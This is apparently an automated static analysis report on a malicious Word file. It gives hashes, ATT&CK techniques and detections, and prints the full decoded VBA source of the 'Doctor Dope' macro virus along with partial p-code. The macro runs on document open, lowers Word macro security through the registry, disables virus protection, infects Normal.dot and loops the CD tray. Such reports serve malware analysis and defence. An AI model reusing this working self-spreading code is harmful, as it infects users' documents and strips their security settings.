Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 645bc355541fe714…

MALICIOUS

Office (OLE)

Size: 31.0 KB
Created: 2023-06-01 03:56:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8946e1a3f4f34e81d108414fda89e787
SHA-1: c352e024b61207fcb4c94030f76d4ea328dd9151
SHA-256: 645bc355541fe7144d00f53e82e3075a230e4f051433a55e4ba1d6b076a645c5
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that runs automatically when the document is opened, which is a strong indicator of malicious intent. The macro attempts to lower the macro security settings of Microsoft Office by writing the registry values 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM'. It also attempts to copy itself into the active document and the Normal.dot template, which suggests an effort to persist and spread to other documents.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10573 bytes
SHA-256: 845e56e74925395a5c626629ee8d30933a2b19d8b9899f13ebbd57b1f4ea7d71
Detection: ClamAV: Doc.Trojan.Assilem-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DrDope"

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub Document_Open()
On Error Resume Next
'VirusName: Doctor Dope
'coded by Necronomikon[rRlf]
'Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
'--- cut here ---
'this code is taken from XP.Kallisti by jackie/lz0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
'--- cut here ---
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NT1 = NT.CodeModule.CountOfLines
AD1 = AD.CodeModule.CountOfLines
Nec = 2
If AD.Name <> "ddope" Then
If AD1 > 0 Then _
AD.CodeModule.DeleteLines 1, AD1
Set ToInfect = AD
AD.Name = "ddope"
DoAD = True
End If
If NT.Name <> "ddope" Then
If NT1 > 0 Then _
NT.CodeModule.DeleteLines 1, NT1
Set ToInfect = NT
NT.Name = "ddope"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo bye
If DoNT = True Then
Do While AD.CodeModule.Lines(1, 1) = ""
AD.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While AD.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, AD.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
End If
If DoAD = True Then
Do While NT.CodeModule.Lines(1, 1) = ""
NT.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NT.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, NT.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
bye:
If NT1 <> 0 And AD1 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
Call Payload
End Sub
Private Sub Payload()
On Error Resume Next
'Thanks WalruS for code!;)
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub

' Processing file: /opt/analyzer/scan_staging/58d599afd5cc441ab082633fb8fadd65.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/DrDope - 5427 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Declare Function mciSendString Lib "winmm.dll" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long)
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	QuoteRem 0x0000 0x0016 "VirusName: Doctor Dope"
' Line #5:
' 	QuoteRem 0x0000 0x001B "coded by Necronomikon[rRlf]"
' Line #6:
' 	QuoteRem 0x0000 0x0049 "Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)"
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #8:
' 	Ld wdAlertsNone 
' 	Ld Application 
'
... (truncated)